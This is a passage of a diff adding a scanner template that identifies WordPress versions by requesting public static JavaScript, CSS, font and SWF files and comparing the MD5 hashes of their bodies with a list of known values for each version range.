md5(body))" + - type: dsl + name: 3.1.4 + dsl: + - "(\"b2385b31e10f0e05868dc9963f6b5492\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.3 + dsl: + - "(\"aba1c36c2aaa7856f19eb45068260a46\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"284081f3b85fbb4cbaf29ff392924c6c\" == md5(body))" + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"b1ba00820be627f9a5bb9ad51c226c6e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/link.dev.js" + matchers: + - type: dsl + name: 3.4.2 + dsl: + - "(\"573fdbc34e8d60090cd5f5290a677078\" == md5(body))" + - type: dsl + name: 3.2 - 3.4.1 + dsl: + - "(\"e1cab0e9026cb713c471a03159aa8472\" == md5(body))" + - type: dsl + name: 3.0 - 3.1.4 + dsl: + - "(\"2886215c2ab637527435c672daa242ab\" == md5(body))" + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"ecf1bfdbf145bdab5a0d61ea4039ef55\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/postbox.dev.js" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"6feb51918fed2bb0c6b8b470deaa4b1f\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"d2894d1539a2a643cef3407784270551\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"f2b64b5e910458f653b82ad02ca3f519\" == md5(body))" + - type: dsl + name: 3.0 - 3.1.4 + dsl: + - "(\"0fd0915b4e9938ea328460378af5b29d\" == md5(body))" + - type: dsl + name: 2.9 - 2.9.2 + dsl: + - "(\"ba550af784b2072d39ca2c6eea2eecbb\" == md5(body))" + - type: dsl + name: 2.8.1 - 2.8.6 + dsl: + - "(\"866680547d1d53c6782291784e89f873\" == md5(body))" + - type: dsl + name: 2.8 + dsl: + - "(\"19bf9fa83624020a518d7bcc8b60c1bd\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/edit-comments.dev.js" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"84faa202d218b1c0df4ada14f9db0121\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"6325c905c75a48653c4d3d0c1dcae7bf\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - 
"(\"5a4f669ae76504682ca496fbde606c88\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"13032daf9f83b9de0aeb220bc4fc1ab2\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"a8ec0a555e4723d13bd14e2f7eda7b44\" == md5(body))" + - type: dsl + name: 2.9 - 2.9.2 + dsl: + - "(\"60dec0058dce41d4dd1a97068403709b\" == md5(body))" + - type: dsl + name: 2.8.1 - 2.8.6 + dsl: + - "(\"6b85ab29401b236b7248d2a1aba7f209\" == md5(body))" + - type: dsl + name: 2.8 + dsl: + - "(\"9b02ddd09ea4d920bcb98e6736fa26ba\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/dashboard.dev.js" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"a86e3c459bfdce83b8925f9dc29a7905\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"371dc51fe87c122bbcb9565c9dd0c145\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"6c9a8d6d69c23e49480e9e164b7cdaa5\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"4791431c439486258873301436af176c\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"1d85acc27d25696f9a998f1fe0cb6a79\" == md5(body))" + - type: dsl + name: 2.8.1 - 2.9.2 + dsl: + - "(\"3e3fbecb5bc1fa258a22a6f9a2a534b1\" == md5(body))" + - type: dsl + name: 2.8 + dsl: + - "(\"9abcfc44be1c15b96453f8b62a5ababf\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/wp_theme/content.css" + matchers: + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"03873ff71f4269941d491b480cb10da0\" == md5(body))" + - type: dsl + name: 3.6 - 3.7.35 + dsl: + - "(\"9bb2cfc47606f21365635bc442a7f3d3\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"e98feb35e99a6a9f541b2a514079d273\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"f42ae068f516911a342284a304411ddb\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"093b2eb2cfc16ba89eebd4869a6d34fe\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - 
"(\"7b4403e4f46a59266dade554f52a4098\" == md5(body))" + - type: dsl + name: 2.9 - 3.1.4 + dsl: + - "(\"52d9608bb02c9d6b3201aa5158537156\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"a1b36551d8a606622d8fa44f42850ec7\" == md5(body))" + - type: dsl + name: 2.6.1 - 2.7.1 + dsl: + - "(\"d231e3407c803b11605532828641b0df\" == md5(body))" + - type: dsl + name: 2.6 + dsl: + - "(\"ebd8fd56a3afb904d89ce735a8aba65b\" == md5(body))" + - type: dsl + name: 2.5 - 2.5.1 + dsl: + - "(\"4e054c57589e78fc6b64c25583536967\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/default/ui.css" + matchers: + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"03ae09e5c5f80f0ed0fc1ebb9c2053f0\" == md5(body))" + - type: dsl + name: 3.3 - 3.4.2 + dsl: + - "(\"642e4f5b08ac1ccc1f1d6d956171ee34\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"720a1323be729253347e733580622e36\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"79352a602390ae6d4e3bf6f9c2494173\" == md5(body))" + - type: dsl + name: 2.7 - 3.0.6 + dsl: + - "(\"95f5bbc6ea992fcb641f0275025dc438\" == md5(body))" + - type: dsl + name: 2.5.1 - 2.6.5 + dsl: + - "(\"baddea3389c84a37f2356e47d168d559\" == md5(body))" + - type: dsl + name: 2.5 + dsl: + - "(\"c11ec4198ab67a1baa9e2d8f515a8629\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/o2k7/ui.css" + matchers: + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"af38b0cc9a19f25f95f8776568549442\" == md5(body))" + - type: dsl + name: 3.3 - 3.4.2 + dsl: + - "(\"5a48c21bde270739664e9dab7c1143ad\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"c483637b2a5e889bed54a3891035f6e6\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"7b21b4f0a4aaaa3b307727482ac73533\" == md5(body))" + - type: dsl + name: 2.7 - 3.0.6 + dsl: + - "(\"b9db394d414b1d2f0d8930522e676c5d\" == md5(body))" + - type: dsl + name: 2.5.1 - 2.6.5 + dsl: + - 
"(\"cfcfd4436b87fbfd59b1d1fb2196f25b\" == md5(body))" + - type: dsl + name: 2.5 + dsl: + - "(\"7778e41dc9384c147e4e1bd44adafa1c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/js/link.js" + matchers: + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"316da7ee59e094228df2a4fb7e39cfa6\" == md5(body))" + - type: dsl + name: 3.2 - 3.4.2 + dsl: + - "(\"b9afd9f4addc771dd657b10e003ab3fd\" == md5(body))" + - type: dsl + name: 2.9 - 3.1.4 + dsl: + - "(\"9f192e4711b35b2fae293ce5d8a1c59e\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"85e3d12f288b9ead43fd6f4e3b341815\" == md5(body))" + - type: dsl + name: 2.5.1 - 2.7.1 + dsl: + - "(\"e4eaaa5fcee50264e9b24370cc802b76\" == md5(body))" + - type: dsl + name: 2.5 + dsl: + - "(\"19c6f3118728c38eb7779aab4847d2d9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpeditimage/editor_plugin_src.js" + matchers: + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"4de9f6b1aafe968e8509ffe7ee9bc973\" == md5(body))" + - type: dsl + name: 3.7.1 - 3.7.35 + dsl: + - "(\"5d01c0e812cdcd6356b78ee0cb4e5426\" == md5(body))" + - type: dsl + name: 3.5 - 3.7 + dsl: + - "(\"653d4dc2d7c3dbdd9ad409ae3f4c4817\" == md5(body))" + - type: dsl + name: 3.4.2 + dsl: + - "(\"23acb7d19b52e8fafaa84c3a342cfe7c\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.1 + dsl: + - "(\"8bd9069b943e4433737689d9f59eee16\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpeditimage/editimage.html" + matchers: + - type: dsl + name: 3.7 - 3.8.35 + dsl: + - "(\"216788f7dbe172a3d3fb827a05d0f837\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"ff7bbb3f7519ab7cc2a9f7fb2a39ea33\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"bc3a66e8d3e0de62ab83d95bd04f4dae\" == md5(body))" + - type: dsl + name: 3.0 - 3.3.3 + dsl: + - "(\"fdea6dce525ebe71c247690f67d32911\" == md5(body))" + - type: dsl + name: 2.8 - 2.9.2 + dsl: + 
- "(\"60340807d945876ff6da82338c84153a\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"e3b3cebf6d65898314f822f8b8aa90b5\" == md5(body))" + - type: dsl + name: 2.6.1 - 2.6.5 + dsl: + - "(\"568910cba72f8a00a7e9de70bcc62c92\" == md5(body))" + - type: dsl + name: 2.6 + dsl: + - "(\"f325a73e1da24a2dc91c8ee18199bb02\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpeditimage/js/editimage.js" + matchers: + - type: dsl + name: 3.7 - 3.8.35 + dsl: + - "(\"decdce43a5ea753c53801b436614249e\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"0a25f1ee5635ea5c98d12fe6a25124dd\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"b7f2ab839344415015809824e6d1ee27\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"7f739de8ea534faec85258212637313c\" == md5(body))" + - type: dsl + name: 3.0 - 3.2.1 + dsl: + - "(\"bf5b713b40828ed678cf3b907c88b3cc\" == md5(body))" + - type: dsl + name: 2.6.1 - 2.9.2 + dsl: + - "(\"bb5ecafedc219aac400807dc283fe273\" == md5(body))" + - type: dsl + name: 2.6 + dsl: + - "(\"d4866567bb43a5f946d15a560629f063\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/inlinepopups/skins/clearlooks2/window.css" + matchers: + - type: dsl + name: 3.3 - 3.8.35 + dsl: + - "(\"db6490f7f7b6a4e9470eab0856c3122a\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"55f7ce40bd02fc916fc8e2614993d5c5\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"880cfaeb6fd12075583b7bc2781f3d36\" == md5(body))" + - type: dsl + name: 2.8 - 3.0.6 + dsl: + - "(\"0fb7cbeaf364b4377fb3126384482aec\" == md5(body))" + - type: dsl + name: 2.5.1 - 2.7.1 + dsl: + - "(\"840e1dcc6263a489e4851a1c7371d48b\" == md5(body))" + - type: dsl + name: 2.5 + dsl: + - "(\"3008a345f351badd78a6d1ace150c901\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wordpress/editor_plugin_src.js" + matchers: + - type: dsl + 
name: 3.8 - 3.8.35 + dsl: + - "(\"0ac5f6185d70a460e207752d2bafa974\" == md5(body))" + - type: dsl + name: 3.6.1 - 3.7.35 + dsl: + - "(\"a7d139d6d9506e005e7aee90d5c7918b\" == md5(body))" + - type: dsl + name: 3.6 + dsl: + - "(\"065e5a8b0d8875768f0b75fc1bf7b6f0\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"ccf5e6012c894a387d6e04300e6d60ed\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"e7a339f2c4da85d8c8fa69173d06012a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/wp-tinymce-schema.js" + matchers: + - type: dsl + name: 3.6 - 3.8.35 + dsl: + - "(\"dcb60a584dfa0b64a31c1ee0b67595cf\" == md5(body))" + - type: dsl + name: 3.5.1 - 3.5.2 + dsl: + - "(\"50f4d4fdb09d43ec39f1d730fd398dd1\" == md5(body))" + - type: dsl + name: 3.5 + dsl: + - "(\"cb88e8f50b53365fb94422e9a269226a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/fonts/dashicons.woff" + matchers: + - type: dsl + name: 4.5 - 5.6 + dsl: + - "(\"0c1c1ad41c025f72592bca820e073bec\" == md5(body))" + - type: dsl + name: 4.3 - 4.4.24 + dsl: + - "(\"a880efb5c3ff8d61a495354352f81afb\" == md5(body))" + - type: dsl + name: 4.1 - 4.2.29 + dsl: + - "(\"78f5e202fde4da61a50d49b27e747eb2\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"20ae16de66f71648336c8b34f8dce20b\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"f53d2bfd11506f77d1f6cfebe4435c1d\" == md5(body))" + - type: dsl + name: 3.8.1 - 3.8.35 + dsl: + - "(\"c7452d909c0fad4f568191fc5e5c77f5\" == md5(body))" + - type: dsl + name: 3.8 + dsl: + - "(\"088ab6f8565d3a0bcc6bee7a64fee658\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/thickbox/thickbox.js" + matchers: + - type: dsl + name: 4.6 - 5.6 + dsl: + - "(\"d5d248a8730754587b4224c2d9ad36c7\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"9fe76355c7009a4dccb10bd3e9347775\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - 
"(\"0d7cfe98065dd12946153ed0987fcc44\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"20baaf5da31ddd92caab7962d15c0ac3\" == md5(body))" + - type: dsl + name: 4.1 - 4.2.29 + dsl: + - "(\"b4ba824311d86552ddc7fe7753ef8925\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"482a8efb7c72fbecfa29a509121ea263\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"f60e0a316f95a2f31df204a9cef6fe28\" == md5(body))" + - type: dsl + name: 3.6 - 3.8.35 + dsl: + - "(\"43e846c82d0eb2e54e55f9bd5b0cd4dd\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"ee978eee2af4a9d56478d4d953c33731\" == md5(body))" + - type: dsl + name: 3.3 - 3.4.2 + dsl: + - "(\"e0bb5a88a4b79d0b41e6dfdca1952fa2\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"e545ca18aef12843121c32a1fee44d78\" == md5(body))" + - type: dsl + name: 3.0 - 3.1.4 + dsl: + - "(\"254033275c930248aec4603d0a5af004\" == md5(body))" + - type: dsl + name: 2.9 - 2.9.2 + dsl: + - "(\"1d8b106fccf7ad647ecfc6cd0d77d304\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"4988c924f8df0898cabbca27c2dc57ef\" == md5(body))" + - type: dsl + name: 2.7.1 + dsl: + - "(\"bf6afa6da821fca17b1d36692adb88d6\" == md5(body))" + - type: dsl + name: 2.5 - 2.7 + dsl: + - "(\"e9af66a7ac48c57e85fb3148e2d5951d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/swfupload/swfupload.swf" + matchers: + - type: dsl + name: 3.6 - 4.8.15 + dsl: + - "(\"bd5a25f23589652ca472d41fe1484f0c\" == md5(body))" + - type: dsl + name: 3.5.2 + dsl: + - "(\"3dc9c7e7c13b2d4edc3ebb7d0e9cdb94\" == md5(body))" + - type: dsl + name: 3.3.2 - 3.5.1 + dsl: + - "(\"c0e5c70af799aeb906b1bef3b11e9a8d\" == md5(body))" + - type: dsl + name: 2.8 - 3.3.1 + dsl: + - "(\"3a1c6cc728dddc258091a601f28a9c12\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"758c0891789a68b465da91f9034a3ec0\" == md5(body))" + - method: GET + path: + - 
"{{BaseURL}}/wp-includes/js/mediaelement/flashmediaelement.swf" + matchers: + - type: dsl + name: 4.6 - 4.8.4 + dsl: + - "(\"2efe1fabfea04432f090ecb3153b10a1\" == md5(body))" + - type: dsl + name: 4.4.3 - 4.5.12 + dsl: + - "(\"e61c004611ce5cc855a3b2ab3e89602d\" == md5(body))" + - type: dsl + name: 4.4 - 4.5.1 + dsl: + - "(\"42c6680f8035fc10855ee2e559c9cc78\" == md5(body))" + - type: dsl + name: 4.3.4 - 4.3.14 + dsl: + - "(\"079d5276459e0e3526afbdb7e1017037\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.3 + dsl: + - "(\"2400c991b8473d44a7edc75605496760\" == md5(body))" + - type: dsl + name: 4.2.8 - 4.2.18 + dsl: + - "(\"bed216acd6fb5318c139087a0a9d6b4d\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.7 + dsl: + - "(\"a77bd46c3904a70f0e4ed6f3f714099a\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.21 + dsl: + - "(\"e78dcab5e8dc6bfad93588602a065c8a\" == md5(body))" + - type: dsl + name: 4.0.1 - 4.0.21 + dsl: + - "(\"7325701f91d0eaa11ec0cc9a6087053f\" == md5(body))" + - type: dsl + name: 4.0 + dsl: + - "(\"582ba00d7a38795bba1306b30c31a6f1\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.22 + dsl: + - "(\"f82e1f904e12a82ac15c63999427c909\" == md5(body))" + - type: dsl + name: 3.6 - 3.8.24 + dsl: + - "(\"03dc1336e5697e4ceda3a7f4b99b71c7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/press-this-rtl.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"f47fbcac042fc512f98220d3eabdc8d5\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"de05e92e39dd7c54887e9aff05928ae2\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"ebe1a8076493805aa48fc343dd86ddb8\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"f0ac357ef35636742935d34c076a805e\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"c78872a5c45c167f9047cf133b1a254d\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"434c0fa5ab62607cf4bf1fc05df759b6\" == md5(body))" + - type: dsl + name: 4.2.3 - 4.2.29 + 
dsl: + - "(\"3ea0570bc9a465ca82c8c8b2bb4f6905\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.2 + dsl: + - "(\"7f2b2879d22aa540d113a4af70999990\" == md5(body))" + - type: dsl + name: 3.9 - 4.1.32 + dsl: + - "(\"551a3e9dcf9854a5c5fcaafe716c6202\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"e8997a81c564cf87fdb0d28cee7bdcf1\" == md5(body))" + - type: dsl + name: 3.0 - 3.1.4 + dsl: + - "(\"c58284f84f50ed17208769e38fd98a96\" == md5(body))" + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"098fcc8fa903f68d4827a80b19ed8624\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"13e9d45958d1edffdc8eb1942f9473a0\" == md5(body))" + - type: dsl + name: 2.6.1 - 2.6.5 + dsl: + - "(\"5f405904ac0da0f8af0af4d401915af0\" == md5(body))" + - type: dsl + name: 2.6 + dsl: + - "(\"1f790c5cfc12b650992c164051a09629\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/charmap/plugin.js" + matchers: + - type: dsl + name: 4.8 - 4.9.5 + dsl: + - "(\"139897943cd17cda7942e1dc94011aca\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.19 + dsl: + - "(\"b450e5710839230572adc66772782a89\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.3 + dsl: + - "(\"d995aeaef8197c23cb1e14e3a479bc00\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"1517fb34539b42af182b5e95d9580a1e\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"8a7931011935fc826805265b3228c616\" == md5(body))" + - type: dsl + name: 4.3.1 - 4.4.24 + dsl: + - "(\"a3a422577ac81c9ef6d7036869c30c7b\" == md5(body))" + - type: dsl + name: 4.3 + dsl: + - "(\"b4f29c072885c987beb19599798babb3\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"61d3e5d077b1d76704eac85c63a148bc\" == md5(body))" + - type: dsl + name: 4.0 - 4.1.32 + dsl: + - "(\"6bf9e5219c34728a89e1e0a987e615d0\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"0fa5d493729a82436d20c26acb7fcbca\" == md5(body))" + - type: dsl + name: 4.9.6 - 4.9.7 + dsl: + - 
"(\"15acd8a331dbf71d226342b71258b015\" == md5(body))" + - type: dsl + name: 4.9.8 - 5.0.11 + dsl: + - "(\"4c3c81756533d703d3bb95ce8f9882a6\" == md5(body))" + - type: dsl + name: 5.1 - 5.6 + dsl: + - "(\"9bb2e1a85cf507d3355ec0cc0bf9b518\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/customize-views.js" + matchers: + - type: dsl + name: 4.7.3 - 4.8.15 + dsl: + - "(\"122b154b05f13396529c049c1a17d8d1\" == md5(body))" + - type: dsl + name: 4.5 - 4.7.2 + dsl: + - "(\"5abea7b6d9a2556fb8cbfcd3f8d1c0ff\" == md5(body))" + - type: dsl + name: 4.3 - 4.4.24 + dsl: + - "(\"fab2f195182995d82502a8ab7f0c79d9\" == md5(body))" + - type: dsl + name: 3.9.1 - 4.2.29 + dsl: + - "(\"ad923bbd7a9caf098f594d0e912379c8\" == md5(body))" + - type: dsl + name: 3.9 + dsl: + - "(\"0aeeca504e00db4a8bef755c7a85a4fa\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"1e619b769bf8f798e13112e221949e02\" == md5(body))" + - type: dsl + name: 5.1 - 5.6 + dsl: + - "(\"22729b3c60a2f3c416c5f944cd01e285\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/media-audiovideo.min.js" + matchers: + - type: dsl + name: 4.5 - 4.8.15 + dsl: + - "(\"f093100d539f03b5d1d31f1e74029b44\" == md5(body))" + - type: dsl + name: 4.3 - 4.4.19 + dsl: + - "(\"aedd794ce915a1b424abcfa487a27876\" == md5(body))" + - type: dsl + name: 4.2.3 - 4.2.24 + dsl: + - "(\"adff9c3836284891ee9c5f4eacc4c708\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.2 + dsl: + - "(\"41ee8d23e04975b16e3fb8d8e949b958\" == md5(body))" + - type: dsl + name: 4.1.1 - 4.1.32 + dsl: + - "(\"ca890daf69ca1fa4112ed913a3a5afcb\" == md5(body))" + - type: dsl + name: 4.0 - 4.1 + dsl: + - "(\"15412686f8145bd551c34f16b2a760a2\" == md5(body))" + - type: dsl + name: 3.9.1 - 3.9.33 + dsl: + - "(\"1f89aaa0c6869d92c26386d3fdf3a394\" == md5(body))" + - type: dsl + name: 3.9 + dsl: + - "(\"6c9436bcb7fab07b86de4e469279eb22\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - 
"(\"12489a4a2667144f42dc607e77a2c2f6\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"454d6c7240151c150a4d52a169cf5ff7\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"c3fd752894ae74b3f9f1b443b30c813d\" == md5(body))" + - type: dsl + name: 4.4.20 - 4.4.24 + dsl: + - "(\"7ccdb368b0e1d219ce7552fd266db94e\" == md5(body))" + - type: dsl + name: 4.2.25 - 4.2.29 + dsl: + - "(\"881779f4a5a994adc3767d405ec5cb0e\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"2c17fb7873f73e7f6a19d201a35cb9ae\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"de96972a78218f779e8113fca52ab704\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/media-audiovideo.js" + matchers: + - type: dsl + name: 4.5 - 4.8.15 + dsl: + - "(\"f256503caa6bc23b44c82e3f46b6b23b\" == md5(body))" + - type: dsl + name: 4.3 - 4.4.19 + dsl: + - "(\"17236090dcb388dd84b091ae7e373ae4\" == md5(body))" + - type: dsl + name: 4.2.3 - 4.2.24 + dsl: + - "(\"f46820fc85dbf7cb188fa00f5e86eb83\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.2 + dsl: + - "(\"197572f6fff30edee0fdc406462726d8\" == md5(body))" + - type: dsl + name: 4.1.1 - 4.1.32 + dsl: + - "(\"7adbf03fa2ee150196ec223a7470cbf0\" == md5(body))" + - type: dsl + name: 4.0 - 4.1 + dsl: + - "(\"7825ea43bee309c4445058686b673caf\" == md5(body))" + - type: dsl + name: 3.9.1 - 3.9.33 + dsl: + - "(\"2609a8c949595ad5dfa6bece456265ff\" == md5(body))" + - type: dsl + name: 3.9 + dsl: + - "(\"b6e377d5177058bc872fd72c625df119\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"9cebbb22b93c5354519ee9a29b60e902\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"4879c39c078d74b588260e5c73e9d141\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"c75f0993477d7c824f929b5c3d788ea8\" == md5(body))" + - type: dsl + name: 4.4.20 - 4.4.24 + dsl: + - "(\"552b12e63a3129de9a94e41889962139\" == md5(body))" + - type: dsl + name: 4.2.25 - 4.2.29 + dsl: + - 
"(\"ea6650e32a7bc1986c28750f2e4aca6b\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"54d8075995b61d4ddae11c67e8ff0667\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"c31fd0b6ddd2e9fb0c741aa693d4dfe8\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/widgets/custom-html-widgets.min.js" + matchers: + - type: dsl + name: 4.9 - 4.9.1 + dsl: + - "(\"551cd10292d57f7a63b336d372dd63e7\" == md5(body))" + - type: dsl + name: 4.9.2 - 5.0.11 + dsl: + - "(\"91ded92347b6cc64e9724408d9defa09\" == md5(body))" + - type: dsl + name: 5.1 + dsl: + - "(\"23ec4608b1a4efda2c3c52c1b945836a\" == md5(body))" + - type: dsl + name: 5.1.1 - 5.2.9 + dsl: + - "(\"feff6bb5c7894507ea30bd0cd7648439\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"d3810da7cecafa8ef492ef7760efdbc2\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"da10249779e84eb738fb4f95395f4a15\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/customize-views.min.js" + matchers: + - type: dsl + name: 4.7.3 - 5.2.9 + dsl: + - "(\"000d91b0de96556e03c3053f728b2987\" == md5(body))" + - type: dsl + name: 4.5 - 4.7.2 + dsl: + - "(\"c5f0abb73e687faebc9bf225a1e0824e\" == md5(body))" + - type: dsl + name: 3.9.1 - 4.4.24 + dsl: + - "(\"05b8ea5fb11adb182563ddb989e091d1\" == md5(body))" + - type: dsl + name: 3.9 + dsl: + - "(\"83c37717273f92513d2f93ca28931fe4\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"169588faa7a29c0efa54e3caadadc3bf\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"1a660eba3ebcb7a4628726cbe7379066\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/customize-preview-nav-menus.min.js" + matchers: + - type: dsl + name: 4.7.1 - 5.2.9 + dsl: + - "(\"526952e7a87a339b276f5dcfc96c5176\" == md5(body))" + - type: dsl + name: 4.7 + dsl: + - "(\"4f1fc16aa63323570bfde1539ec30245\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - 
